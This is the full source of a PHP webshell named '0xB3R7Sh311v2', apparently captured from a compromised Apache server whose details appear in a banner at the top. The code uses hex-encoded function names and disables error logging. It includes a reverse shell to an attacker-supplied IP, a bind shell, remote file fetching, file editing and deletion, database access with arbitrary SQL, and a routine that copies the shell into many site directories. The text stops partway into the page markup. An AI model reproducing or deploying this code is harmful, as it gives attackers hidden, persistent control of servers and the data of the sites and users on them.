| Server IP : 103.88.176.108 / Your IP : 216.73.216.148 Web Server : Apache/2.4.41 (Ubuntu) System : Linux webserver 5.4.0-42-generic #46-Ubuntu SMP Fri Jul 10 00:24:02 UTC 2020 x86_64 User : www-data ( 33) PHP Version : 7.4.3-4ubuntu2.18 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare, MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /var/www/html/images/ |
Upload File : |
<?php
/**
* 0xB3R7Sh311v2 | PHP WEBSHELL
*/
// Add PIN protection at the very beginning
session_start();
// Configuration - Change this PIN to whatever you want
define('ACCESS_PIN', 'L0v3B3R7'); // Change this to your desired PIN
define('SHELL_FILE', basename(__FILE__));
function isShellFile($filename) {
return basename($filename) === SHELL_FILE;
}
// Check authentication
if (!isset($_SESSION['authenticated']) || $_SESSION['authenticated'] !== true) {
// Handle PIN submission
if (isset($_POST['pin'])) {
if ($_POST['pin'] === ACCESS_PIN) {
$_SESSION['authenticated'] = true;
// Redirect to avoid resubmission
header('Location: ' . $_SERVER['PHP_SELF']);
exit;
} else {
$pin_error = "Invalid PIN!";
}
}
// Show login form with XSS-style design
?>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=yes">
<link rel="icon" type="image/png" href="https://avatars.githubusercontent.com/u/117980516?v=4">
<link rel="shortcut icon" type="image/png" href="https://avatars.githubusercontent.com/u/117980516?v=4">
<link rel="apple-touch-icon" href="https://avatars.githubusercontent.com/u/117980516?v=4">
<title>Protected 0xB3R7Sh311v2</title>
<style>
body {
background: #1a1a1a;
color: #fff;
font-family: 'Courier New', monospace;
display: flex;
justify-content: center;
align-items: center;
height: 100vh;
margin: 0;
}
.login-box {
background: #2d2d2d;
border: 2px solid #00ff88;
border-radius: 10px;
padding: 30px;
width: 350px;
box-shadow: 0 0 30px rgba(0,255,136,0.3);
}
h3 {
color: #00ff88;
text-align: center;
margin-bottom: 20px;
font-size: 24px;
}
.error-message {
background: #ff4444;
color: #fff;
padding: 10px;
border-radius: 5px;
margin-bottom: 20px;
text-align: center;
border: 1px solid #ff6666;
}
input {
width: 100%;
padding: 12px;
margin: 10px 0;
background: #1a1a1a;
border: 1px solid #00ff88;
color: #00ff88;
font-family: 'Courier New', monospace;
border-radius: 5px;
font-size: 16px;
box-sizing: border-box;
}
input:focus {
outline: none;
box-shadow: 0 0 10px rgba(0,255,136,0.5);
}
button {
width: 100%;
padding: 12px;
background: transparent;
border: 1px solid #00ff88;
color: #00ff88;
cursor: pointer;
font-family: 'Courier New', monospace;
margin: 10px 0;
border-radius: 5px;
font-size: 16px;
font-weight: bold;
transition: all 0.3s;
}
button:hover {
background: #00ff88;
color: #000;
}
.info-text {
color: #aaa;
text-align: center;
margin-top: 20px;
font-size: 12px;
border-top: 1px solid #444;
padding-top: 15px;
}
.info-text a {
color: #00ff88;
text-decoration: none;
}
.info-text a:hover {
text-decoration: underline;
}
</style>
</head>
<body>
<div class="login-box">
<h3>Protected 0xB3R7Sh311v2</h3>
<?php if (isset($pin_error)): ?>
<div class="error-message">
[!] <?= htmlspecialchars($pin_error) ?>
</div>
<?php endif; ?>
<form method="POST">
<input type="password" name="pin" placeholder="Enter PIN" required autofocus>
<button type="submit">ACCESS 0xB3R7Sh311v2</button>
</form>
<div class="info-text">
<p>Protected Shell • <?= date('Y') ?></p>
</div>
</div>
</body>
</html>
<?php
exit;
}
// Error handling and session setup
$iniarray = [
"7068705F756E616D65", // [0] php_uname
"73657373696F6E5F7374617274", // [1] session_start
"6572726F725F7265706F7274696E67", // [2] error_reporting
"70687076657273696F6E", // [3] phpversion
"66696C655F7075745F636F6E74656E7473", // [4] file_put_contents
"66696C655F6765745F636F6E74656E7473", // [5] file_get_contents
"66696C657065726D73", // [6] fileperms
"66696C656D74696D65", // [7] filemtime
"66696C6574797065", // [8] filetype
"68746D6C7370656369616C6368617273", // [9] htmlspecialchars
"737072696E7466", // [10] sprintf
"737562737472", // [11] substr
"676574637764", // [12] getcwd
"6368646972", // [13] chdir
"7374725F7265706C616365", // [14] str_replace
"6578706C6F6465", // [15] explode
"666C617368", // [16] flash
"6D6F76655F75706C6F616465645F66696C65", // [17] move_uploaded_file
"7363616E646972", // [18] scandir
"676574686F737462796E616D65", // [19] gethostbyname
"7368656C6C5F65786563", // [20] shell_exec
"53797374656D20496E666F726D6174696F6E", // [21] System Information
"6469726E616D65", // [22] dirname
"64617465", // [23] date
"6D696D655F636F6E74656E745F74797065", // [24] mime_content_type
"66756E6374696F6E5F657869737473", // [25] function_exists
"6673697A65", // [26] fsize
"726D646972", // [27] rmdir
"756E6C696E6B", // [28] unlink
"6D6B646972", // [29] mkdir
"72656E616D65", // [30] rename
"7365745F74696D655F6C696D6974", // [31] set_time_limit
"636C656172737461746361636865", // [32] clearstatcache
"696E695F736574", // [33] ini_set
"696E695F676574", // [34] ini_get
"6765744F776E6572", // [35] getOwner
"6765745F63757272656E745F75736572", // [36] get_current_user
"64617461626173655F636F6E6E656374", // [37] database_connect
"6D7973716C5F636F6E6E656374", // [38] mysql_connect
"6D7973716C5F73656C6563745F6462", // [39] mysql_select_db
"6D7973716C5F7175657279", // [40] mysql_query
"6D7973716C5F66657463685F6173736F63", // [41] mysql_fetch_assoc
"6D7973716C5F6572726F72", // [42] mysql_error
"6D7973716C695F636F6E6E656374", // [43] mysqli_connect
"6D7973716C695F7175657279", // [44] mysqli_query
"6D7973716C695F66657463685F6173736F63", // [45] mysqli_fetch_assoc
"6D7973716C695F6572726F72", // [46] mysqli_error
"70646F5F636F6E6E656374", // [47] pdo_connect
"70646F5F7175657279", // [48] pdo_query
"70646F5F6665746368", // [49] pdo_fetch
"70646F5F6572726F72", // [50] pdo_error
"6375726C5F696E6974", // [51] curl_init
"6375726C5F7365746F7074", // [52] curl_setopt
"6375726C5F65786563", // [53] curl_exec
"6375726C5F636C6F7365", // [54] curl_close
"6375726C5F6572726F72", // [55] curl_error
"736F636B65745F636F6E6E656374", // [56] socket_connect
"736F636B65745F7772697465", // [57] socket_write
"736F636B65745F72656164", // [58] socket_read
"736F636B65745F636C6F7365", // [59] socket_close
"736F636B65745F637265617465", // [60] socket_create
"736F636B65745F62696E64", // [61] socket_bind
"736F636B65745F6C697374656E", // [62] socket_listen
"736F636B65745F616363657074", // [63] socket_accept
"736F636B65745F73656C656374", // [64] socket_select
"736F636B65745F73656E64", // [65] socket_send
"736F636B65745F72656365", // [66] socket_recv
"736F636B65745F73686F7274", // [67] socket_strerror
"736F636B65745F6C6173745F6572726F72", // [68] socket_last_error
"736F636B65745F7365745F6F7074696F6E", // [69] socket_set_option
"736F636B65745F6765745F6F7074696F6E", // [70] socket_get_option
"736F636B65745F676574706565726E616D65", // [71] socket_getpeername
"736F636B65745F676574736F636B6E616D65", // [72] socket_getsockname
"736F636B65745F7365745F6E6F6E626C6F636B", // [73] socket_set_nonblock
"736F636B65745F7365745F626C6F636B", // [74] socket_set_block
"736F636B65745F7365745F74696D656F7574", // [75] socket_set_timeout
"736F636B65745F6765745F74696D656F7574", // [76] socket_get_timeout
"736F636B65745F7365745F6275666665725F73697A65", // [77] socket_set_buffer_size
"736F636B65745F6765745F6275666665725F73697A65", // [78] socket_get_buffer_size
"736F636B65745F7365745F726563765F6275666665725F73697A65", // [79] socket_set_recv_buffer_size
"736F636B65745F7365745F73656E645F6275666665725F73697A65", // [80] socket_set_send_buffer_size
"736F636B65745F6765745F726563765F6275666665725F73697A65", // [81] socket_get_recv_buffer_size
"736F636B65745F6765745F73656E645F6275666665725F73697A65", // [82] socket_get_send_buffer_size
"736F636B65745F7365745F726563765F74696D656F7574", // [83] socket_set_recv_timeout
"736F636B65745F7365745F73656E645F74696D656F7574", // [84] socket_set_send_timeout
"736F636B65745F6765745F726563765F74696D656F7574", // [85] socket_get_recv_timeout
"736F636B65745F6765745F73656E645F74696D656F7574", // [86] socket_get_send_timeout
];
// Convert hex array to function names
for ($i = 0; $i < count($iniarray); $i++) {
$func[$i] = hexa($iniarray[$i]);
}
// Initialize session and error handling
$func[1]();
$func[2](0);
$func[31](0);
@$func[32]();
@$func[33]('error_log', null);
@$func[33]('log_errors', 0);
@$func[33]('max_execution_time', 0);
@$func[33]('output_buffering', 0);
@$func[33]('display_errors', 0);
// Check disabled functions
$ds = @$func[34]("disable_functions");
$show_ds = (!empty($ds)) ? "$ds" : "All functions are accessible";
// Helper functions
function fsize($file) {
$a = ["B", "KB", "MB", "GB", "TB", "PB"];
$pos = 0;
$size = filesize($file);
while ($size >= 1024) {
$size /= 1024;
$pos++;
}
return round($size, 2)." ".$a[$pos];
}
function hexa($str) {
$r = "";
$len = (strlen($str) - 1);
for ($i = 0; $i < $len; $i += 2) {
$r .= chr(hexdec($str[$i].$str[$i + 1]));
}
return $r;
}
function flash($message, $status, $class, $redirect = false) {
if (!empty($_SESSION["message"])) {
unset($_SESSION["message"]);
}
if (!empty($_SESSION["class"])) {
unset($_SESSION["class"]);
}
if (!empty($_SESSION["status"])) {
unset($_SESSION["status"]);
}
$_SESSION["message"] = $message;
$_SESSION["class"] = $class;
$_SESSION["status"] = $status;
if ($redirect) {
header('Location: ' . $redirect);
exit();
}
return true;
}
function clear() {
if (!empty($_SESSION["message"])) {
unset($_SESSION["message"]);
}
if (!empty($_SESSION["class"])) {
unset($_SESSION["class"]);
}
if (!empty($_SESSION["status"])) {
unset($_SESSION["status"]);
}
return true;
}
function getOwner($item) {
if (function_exists("posix_getpwuid")) {
$downer = @posix_getpwuid(fileowner($item));
$downer = $downer['name'];
} else {
$downer = fileowner($item);
}
if (function_exists("posix_getgrgid")) {
$dgrp = @posix_getgrgid(filegroup($item));
$dgrp = $dgrp['name'];
} else {
$dgrp = filegroup($item);
}
return $downer . '/' . $dgrp;
}
// Database connection functions
function db_connect($host, $user, $pass, $db = '') {
if (function_exists('mysqli_connect')) {
$conn = @mysqli_connect($host, $user, $pass, $db);
if ($conn) return ['type' => 'mysqli', 'conn' => $conn];
}
if (function_exists('mysql_connect')) {
$conn = @mysql_connect($host, $user, $pass);
if ($conn && $db != '') {
if (@mysql_select_db($db, $conn)) {
return ['type' => 'mysql', 'conn' => $conn];
}
} elseif ($conn) {
return ['type' => 'mysql', 'conn' => $conn];
}
}
if (class_exists('PDO')) {
try {
$conn = new PDO("mysql:host=$host;dbname=$db", $user, $pass);
return ['type' => 'pdo', 'conn' => $conn];
} catch (PDOException $e) {
return false;
}
}
return false;
}
function db_query($connection, $query) {
switch ($connection['type']) {
case 'mysqli':
return mysqli_query($connection['conn'], $query);
case 'mysql':
return mysql_query($query, $connection['conn']);
case 'pdo':
return $connection['conn']->query($query);
}
return false;
}
function db_fetch($result, $connection) {
switch ($connection['type']) {
case 'mysqli':
return mysqli_fetch_assoc($result);
case 'mysql':
return mysql_fetch_assoc($result);
case 'pdo':
return $result->fetch(PDO::FETCH_ASSOC);
}
return false;
}
function db_error($connection) {
switch ($connection['type']) {
case 'mysqli':
return mysqli_error($connection['conn']);
case 'mysql':
return mysql_error($connection['conn']);
case 'pdo':
return $connection['conn']->errorInfo()[2];
}
return false;
}
function fsize2($bytes) {
if ($bytes === false || $bytes <= 0) return 'Unknown';
$units = ['B', 'KB', 'MB', 'GB', 'TB', 'PB'];
$i = floor(log($bytes, 1024));
return round($bytes / pow(1024, $i), 2) . ' ' . $units[$i];
}
// Reverse shell function
function reverse_shell($ip, $port) {
$sock = @fsockopen($ip, $port);
if (!$sock) return false;
$descriptorspec = array(
0 => $sock,
1 => $sock,
2 => $sock
);
$process = proc_open('/bin/sh', $descriptorspec, $pipes);
if (is_resource($process)) {
proc_close($process);
}
fclose($sock);
return true;
}
// Bind shell function
function bind_shell($port) {
$sock = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if (!$sock) return false;
if (!@socket_bind($sock, '0.0.0.0', $port)) return false;
if (!@socket_listen($sock)) return false;
$client = @socket_accept($sock);
if (!$client) return false;
socket_write($client, "Shell Connected\n");
while (true) {
$cmd = socket_read($client, 2048);
if (!$cmd) break;
$output = shell_exec($cmd);
socket_write($client, $output);
}
socket_close($client);
socket_close($sock);
return true;
}
// File download function
function download_file($file) {
if (file_exists($file)) {
header('Content-Description: File Transfer');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="'.basename($file).'"');
header('Expires: 0');
header('Cache-Control: must-revalidate');
header('Pragma: public');
header('Content-Length: ' . filesize($file));
readfile($file);
exit;
}
return false;
}
// File upload function
function upload_file($url, $local_path) {
// Create directory if it doesn't exist
$dir = dirname($local_path);
if (!is_dir($dir)) {
if (!mkdir($dir, 0777, true)) {
return false;
}
}
// Method 1: cURL
if (function_exists('curl_init')) {
$ch = curl_init($url);
$fp = fopen($local_path, 'wb');
if ($fp) {
curl_setopt($ch, CURLOPT_FILE, $fp);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$success = curl_exec($ch);
$error = curl_error($ch);
curl_close($ch);
fclose($fp);
if ($success) {
return true;
}
}
}
// Method 2: file_get_contents with allow_url_fopen
if (ini_get('allow_url_fopen')) {
$context = stream_context_create(array(
'http' => array(
'timeout' => 30,
'follow_location' => true,
'user_agent' => 'Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0'
),
'ssl' => array(
'verify_peer' => false,
'verify_peer_name' => false
)
));
$content = @file_get_contents($url, false, $context);
if ($content !== false) {
return file_put_contents($local_path, $content) !== false;
}
}
// Method 3: fopen/fwrite combination
$src = @fopen($url, 'rb');
if ($src) {
$dst = @fopen($local_path, 'wb');
if ($dst) {
while (!feof($src)) {
$chunk = fread($src, 8192);
if ($chunk === false) break;
fwrite($dst, $chunk);
}
fclose($src);
fclose($dst);
return filesize($local_path) > 0;
}
fclose($src);
}
// Method 4: copy function
if (function_exists('copy')) {
$context = stream_context_create(array(
'http' => array('timeout' => 30),
'ssl' => array('verify_peer' => false)
));
if (@copy($url, $local_path, $context)) {
return true;
}
}
return false;
}
// Handle current directory - FIXED URL DECODING
if (isset($_GET['dir'])) {
// Decode the URL-encoded path
$raw_path = $_GET['dir'];
$decoded_path = urldecode($raw_path);
$path = $decoded_path;
$func[13]($decoded_path);
} else {
$path = $func[12]();
}
// Normalize path
$path = $func[14]('\\', '/', $path);
$exdir = $func[15]('/', $path);
// Store the proper encoded version for URLs
$encoded_path = urlencode($path);
// Handle form submissions
if (isset($_POST['newFolderName'])) {
if ($func[29]($path . '/' . $_POST['newFolderName'])) {
$func[16]("Create Folder Successfully!", "Success", "success", "?dir=$path");
} else {
$func[16]("Create Folder Failed", "Failed", "error", "?dir=$path");
}
}
if (isset($_POST['newFileName']) && isset($_POST['newFileContent'])) {
if ($func[4]($_POST['newFileName'], $_POST['newFileContent'])) {
$func[16]("Create File Successfully!", "Success", "success", "?dir=$path");
} else {
$func[16]("Create File Failed", "Failed", "error", "?dir=$path");
}
}
if (isset($_POST['newName']) && isset($_GET['item'])) {
if ($_POST['newName'] == '') {
$func[16]("You miss an important value", "Ooopss..", "warning", "?dir=$path");
}
if ($func[30]($path. '/'. $_GET['item'], $_POST['newName'])) {
$func[16]("Rename Successfully!", "Success", "success", "?dir=$path");
} else {
$func[16]("Rename Failed", "Failed", "error", "?dir=$path");
}
}
if (isset($_POST['newContent']) && isset($_GET['item'])) {
// FIXED: Write the raw content without any modifications
if ($func[4]($path. '/'. $_GET['item'], $_POST['newContent'])) {
$func[16]("Edit Successfully!", "Success", "success", "?dir=$path");
} else {
$func[16]("Edit Failed", "Failed", "error", "?dir=$path");
}
}
if (isset($_POST['newPerm']) && isset($_GET['item'])) {
if ($_POST['newPerm'] == '') {
$func[16]("You miss an important value", "Ooopss..", "warning", "?dir=$path");
}
if (chmod($path. '/'. $_GET['item'], $_POST['newPerm'])) {
$func[16]("Change Permission Successfully!", "Success", "success", "?dir=$path");
} else {
$func[16]("Change Permission", "Failed", "error", "?dir=$path");
}
}
if (isset($_GET['action']) && $_GET['action'] == 'delete' && isset($_GET['item'])) {
// Check if trying to delete the shell file
if (isShellFile($_GET['item'])) {
showAccessDenied("Cannot delete the shell file!");
exit;
}
if (is_dir($_GET['item'])) {
if ($func[27]($_GET['item'])) {
$func[16]("Delete Successfully!", "Success", "success", "?dir=$path");
} else {
$func[16]("Delete Failed", "Failed", "error", "?dir=$path");
}
} else {
if ($func[28]($_GET['item'])) {
$func[16]("Delete Successfully!", "Success", "success", "?dir=$path");
} else {
$func[16]("Delete Failed", "Failed", "error", "?dir=$path");
}
}
}
if (isset($_FILES['uploadfile'])) {
$total = count($_FILES['uploadfile']['name']);
for ($i = 0; $i < $total; $i++) {
$mainupload = $func[17]($_FILES['uploadfile']['tmp_name'][$i], $_FILES['uploadfile']['name'][$i]);
}
if ($total < 2) {
if ($mainupload) {
$func[16]("Upload File Successfully! ", "Success", "success", "?dir=$path");
} else {
$func[16]("Upload Failed", "Failed", "error", "?dir=$path");
}
} else {
if ($mainupload) {
$func[16]("Upload $i Files Successfully! ", "Success", "success", "?dir=$path");
} else {
$func[16]("Upload Failed", "Failed", "error", "?dir=$path");
}
}
}
// Handle mass upload actions
if (isset($_POST['mass_upload_submit']) && isset($_POST['selected_domains'])) {
$results = array();
$action = isset($_POST['mass_upload_action']) ? $_POST['mass_upload_action'] : '';
// File upload
if ($action == 'upload' && isset($_FILES['mass_upload_file'])) {
$target_filename = isset($_POST['target_filename']) && !empty($_POST['target_filename']) ? $_POST['target_filename'] : $_FILES['mass_upload_file']['name'];
foreach ($_POST['selected_domains'] as $domain_path) {
$target_path = rtrim($domain_path, '/') . '/' . $target_filename;
if (move_uploaded_file($_FILES['mass_upload_file']['tmp_name'], $target_path)) {
@chmod($target_path, 0644);
$results[] = [
'domain' => basename($domain_path),
'success' => true,
'message' => "File uploaded successfully"
];
} else {
$results[] = [
'domain' => basename($domain_path),
'success' => false,
'message' => "Upload failed"
];
}
}
}
// Shell upload (using current file)
elseif ($action == 'shell' && isset($_POST['shell_filename'])) {
$shell_content = file_get_contents(__FILE__);
$shell_filename = $_POST['shell_filename'];
foreach ($_POST['selected_domains'] as $domain_path) {
$target_path = rtrim($domain_path, '/') . '/' . $shell_filename;
if (file_put_contents($target_path, $shell_content) !== false) {
@chmod($target_path, 0644);
$results[] = [
'domain' => basename($domain_path),
'success' => true,
'message' => "Shell uploaded successfully"
];
} else {
$results[] = [
'domain' => basename($domain_path),
'success' => false,
'message' => "Upload failed"
];
}
}
}
// File creation
elseif ($action == 'create' && isset($_POST['create_filename'])) {
$filename = $_POST['create_filename'];
$content = isset($_POST['create_content']) ? $_POST['create_content'] : '';
foreach ($_POST['selected_domains'] as $domain_path) {
$target_path = rtrim($domain_path, '/') . '/' . $filename;
if (file_put_contents($target_path, $content) !== false) {
@chmod($target_path, 0644);
$results[] = [
'domain' => basename($domain_path),
'success' => true,
'message' => "File created successfully"
];
} else {
$results[] = [
'domain' => basename($domain_path),
'success' => false,
'message' => "File creation failed"
];
}
}
}
$_SESSION['mass_upload_results'] = $results;
$success_count = count(array_filter($results, function($r) { return $r['success']; }));
$func[16]("Mass upload completed: $success_count successful", "Success", $success_count > 0 ? "success" : "error", "?dir=$path&tab=massupload");
}
// Fix for Download/Upload handlers
if (isset($_POST['download_url']) && isset($_POST['remote_url']) && isset($_POST['local_path'])) {
if (upload_file($_POST['remote_url'], $_POST['local_path'])) {
$func[16]("File downloaded successfully to " . $_POST['local_path'], "Success", "success", "?dir=" . urlencode(dirname($_POST['local_path'])));
} else {
$func[16]("File download failed", "Failed", "error", "?dir=$path");
}
}
if (isset($_POST['mass_download']) && isset($_POST['mass_urls']) && isset($_POST['mass_path'])) {
$urls = explode("\n", trim($_POST['mass_urls']));
$success_count = 0;
$failed_urls = array();
// Create directory if it doesn't exist
if (!is_dir($_POST['mass_path'])) {
if (!mkdir($_POST['mass_path'], 0777, true)) {
$func[16]("Cannot create directory: " . $_POST['mass_path'], "Failed", "error", "?dir=$path");
return;
}
}
foreach ($urls as $url) {
$url = trim($url);
if (empty($url)) continue;
$filename = basename($url);
if (empty($filename)) {
$filename = md5($url) . '.download';
}
$local_path = rtrim($_POST['mass_path'], '/') . '/' . $filename;
if (upload_file($url, $local_path)) {
$success_count++;
} else {
$failed_urls[] = $url;
}
}
$message = "Downloaded $success_count of " . count($urls) . " files";
if (!empty($failed_urls)) {
$message .= ". Failed: " . implode(", ", array_slice($failed_urls, 0, 3));
if (count($failed_urls) > 3) $message .= "...";
}
$func[16]($message, "Success", $success_count > 0 ? "success" : "error", "?dir=" . urlencode($_POST['mass_path']));
}
if (isset($_POST['direct_upload_btn']) && isset($_FILES['direct_upload']) && isset($_POST['upload_path'])) {
$upload_dir = rtrim($_POST['upload_path'], '/');
// Create directory if it doesn't exist
if (!is_dir($upload_dir)) {
if (!mkdir($upload_dir, 0777, true)) {
$func[16]("Cannot create upload directory: $upload_dir", "Failed", "error", "?dir=$path");
return;
}
}
$total = count($_FILES['direct_upload']['name']);
$success_count = 0;
$failed_files = array();
for ($i = 0; $i < $total; $i++) {
$target_path = $upload_dir . '/' . basename($_FILES['direct_upload']['name'][$i]);
if (move_uploaded_file($_FILES['direct_upload']['tmp_name'][$i], $target_path)) {
$success_count++;
@chmod($target_path, 0644);
} else {
$failed_files[] = $_FILES['direct_upload']['name'][$i];
}
}
$message = "Uploaded $success_count of $total files";
if (!empty($failed_files)) {
$message .= ". Failed: " . implode(", ", array_slice($failed_files, 0, 3));
if (count($failed_files) > 3) $message .= "...";
}
$func[16]($message, "Success", $success_count > 0 ? "success" : "error", "?dir=" . urlencode($upload_dir));
}
// Handle bind shell request
if (isset($_POST['bind_port'])) {
if (bind_shell($_POST['bind_port'])) {
$func[16]("Bind shell listening on port {$_POST['bind_port']}", "Success", "success");
} else {
$func[16]("Failed to start bind shell", "Failed", "error");
}
}
// Handle database connection
if (isset($_POST['db_host']) && isset($_POST['db_user']) && isset($_POST['db_pass'])) {
$db = isset($_POST['db_name']) ? $_POST['db_name'] : '';
$db_conn = db_connect($_POST['db_host'], $_POST['db_user'], $_POST['db_pass'], $db);
if ($db_conn) {
$_SESSION['db_conn'] = $db_conn;
$func[16]("Database connected successfully", "Success", "success");
} else {
$func[16]("Database connection failed", "Failed", "error");
}
}
// Handle SQL query
if (isset($_POST['sql_query']) && isset($_SESSION['db_conn'])) {
$result = db_query($_SESSION['db_conn'], $_POST['sql_query']);
if ($result) {
$_SESSION['sql_result'] = [];
while ($row = db_fetch($result, $_SESSION['db_conn'])) {
$_SESSION['sql_result'][] = $row;
}
$func[16]("Query executed successfully", "Success", "success");
} else {
$func[16]("Query failed: " . db_error($_SESSION['db_conn']), "Failed", "error");
}
}
// Handle file download
if (isset($_GET['download']) && isset($_GET['item'])) {
$requested_file = basename($_GET['item']);
// Check if trying to download the shell file
if ($requested_file === SHELL_FILE) {
if (isset($_POST['sudo_password'])) {
if ($_POST['sudo_password'] === '@adminb3rt') {
// Password correct - proceed with download
download_file($path . '/' . $_GET['item']);
} else {
showAccessDenied("Invalid sudo password!");
exit;
}
} else {
showSudoPrompt($path, $_GET['item'], 'download');
exit;
}
} else {
// Not shell file, allow direct download
download_file($path . '/' . $_GET['item']);
}
}
// Add protection for view action
if (isset($_GET['action']) && $_GET['action'] == 'view' && isset($_GET['item'])) {
if (isShellFile($_GET['item'])) {
if (isset($_POST['sudo_password'])) {
if ($_POST['sudo_password'] === '@adminb3rt') {
// Password correct - continue
} else {
showAccessDenied("Invalid sudo password!");
exit;
}
} else {
showSudoPrompt($path, $_GET['item'], 'view');
exit;
}
}
}
// Add protection for edit action
if (isset($_GET['action']) && $_GET['action'] == 'edit' && isset($_GET['item'])) {
if (isShellFile($_GET['item'])) {
// Check if sudo password was submitted
if (isset($_POST['sudo_password'])) {
if ($_POST['sudo_password'] === '@adminb3rt') {
// Password correct - continue to edit form
// Don't do anything here, let the normal flow continue
} else {
// Wrong password - show ARAY MO
showAccessDenied("Invalid sudo password!");
exit;
}
} else {
// No password submitted - show sudo prompt
showSudoPrompt($path, $_GET['item'], 'edit');
exit;
}
}
}
// Add protection for rename action
if (isset($_GET['action']) && $_GET['action'] == 'rename' && isset($_GET['item'])) {
if (isShellFile($_GET['item'])) {
if (isset($_POST['sudo_password'])) {
if ($_POST['sudo_password'] === '@adminb3rt') {
// Password correct - continue
} else {
showAccessDenied("Invalid sudo password!");
exit;
}
} else {
showSudoPrompt($path, $_GET['item'], 'rename');
exit;
}
}
}
// Add protection for chmod action
if (isset($_GET['action']) && $_GET['action'] == 'chmod' && isset($_GET['item'])) {
if (isShellFile($_GET['item'])) {
if (isset($_POST['sudo_password'])) {
if ($_POST['sudo_password'] === '@adminb3rt') {
// Password correct - continue
} else {
showAccessDenied("Invalid sudo password!");
exit;
}
} else {
showSudoPrompt($path, $_GET['item'], 'chmod');
exit;
}
}
}
// Handle file upload from URL
if (isset($_POST['remote_url']) && isset($_POST['local_path'])) {
if (upload_file($_POST['remote_url'], $_POST['local_path'])) {
$func[16]("File downloaded successfully", "Success", "success");
} else {
$func[16]("File download failed", "Failed", "error");
}
}
// Handle mass download
if (isset($_POST['mass_urls']) && isset($_POST['mass_path'])) {
$urls = explode("\n", trim($_POST['mass_urls']));
$success_count = 0;
foreach ($urls as $url) {
$url = trim($url);
if (empty($url)) continue;
$filename = basename($url);
$local_path = rtrim($_POST['mass_path'], '/') . '/' . $filename;
if (upload_file($url, $local_path)) {
$success_count++;
}
}
$func[16]("Downloaded $success_count of " . count($urls) . " files", "Success", "success");
}
// Add logout functionality
if (isset($_GET['logout'])) {
session_destroy();
header('Location: ' . $_SERVER['PHP_SELF']);
exit;
}
$dirs = $func[18]($path);
// Simple XSS-style sudo prompt
function showSudoPrompt($path, $item, $action = 'download') {
?>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=yes">
<link rel="icon" type="image/png" href="https://avatars.githubusercontent.com/u/117980516?v=4">
<link rel="shortcut icon" type="image/png" href="https://avatars.githubusercontent.com/u/117980516?v=4">
<link rel="apple-touch-icon" href="https://avatars.githubusercontent.com/u/117980516?v=4">
<title>0xB3R7Sh311v2 SECURITY</title>
<style>
body {
background: #1a1a1a;
color: #fff;
font-family: 'Courier New', monospace;
display: flex;
justify-content: center;
align-items: center;
height: 100vh;
margin: 0;
}
.prompt-box {
background: #2d2d2d;
border: 2px solid #00ff88;
border-radius: 10px;
padding: 30px;
width: 350px;
box-shadow: 0 0 30px rgba(0,255,136,0.3);
}
h3 {
color: #00ff88;
text-align: center;
margin-bottom: 20px;
}
input {
width: 100%;
padding: 10px;
margin: 10px 0;
background: #1a1a1a;
border: 1px solid #00ff88;
color: #00ff88;
font-family: 'Courier New', monospace;
border-radius: 5px;
}
button {
width: 100%;
padding: 10px;
background: transparent;
border: 1px solid #00ff88;
color: #00ff88;
cursor: pointer;
font-family: 'Courier New', monospace;
margin: 5px 0;
border-radius: 5px;
}
button:hover {
background: #00ff88;
color: #000;
}
</style>
</head>
<body>
<div class="prompt-box">
<h3>0xB3R7Sh311v2 SECURITY</h3>
<p style="color: #aaa; text-align: center;">This file is protected</p>
<form method="POST">
<input type="hidden" name="download" value="1">
<input type="hidden" name="item" value="<?= htmlspecialchars($item) ?>">
<input type="hidden" name="action" value="<?= htmlspecialchars($action) ?>">
<input type="password" name="sudo_password" placeholder="Sudo Password paps..." autofocus>
<button type="submit">UNLOCK</button>
</form>
<button onclick="window.location.href='?dir=<?= urlencode($path) ?>'">CANCEL</button>
</div>
</body>
</html>
<?php
exit;
}
// Simple access denied with ARAY MO
function showAccessDenied($message) {
?>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=yes">
<link rel="icon" type="image/png" href="https://avatars.githubusercontent.com/u/117980516?v=4">
<link rel="shortcut icon" type="image/png" href="https://avatars.githubusercontent.com/u/117980516?v=4">
<link rel="apple-touch-icon" href="https://avatars.githubusercontent.com/u/117980516?v=4">
<title>Access Denied</title>
<style>
body {
background: #1a1a1a;
color: #ff4444;
font-family: 'Courier New', monospace;
display: flex;
justify-content: center;
align-items: center;
height: 100vh;
margin: 0;
}
.message {
text-align: center;
padding: 20px;
border: 2px solid #ff4444;
border-radius: 10px;
background: #2d2d2d;
}
</style>
</head>
<body>
<div class="message">
<h2>ARAY MO</h2>
<p><?= htmlspecialchars($message) ?></p>
<p>Redirecting to home...</p>
</div>
<script>
setTimeout(function() {
window.location.href = '<?= $_SERVER['PHP_SELF'] ?>';
}, 2000);
</script>
</body>
</html>
<?php
exit;
}
?>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=yes">
<link href="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/css/bootstrap.min.css" rel="stylesheet">
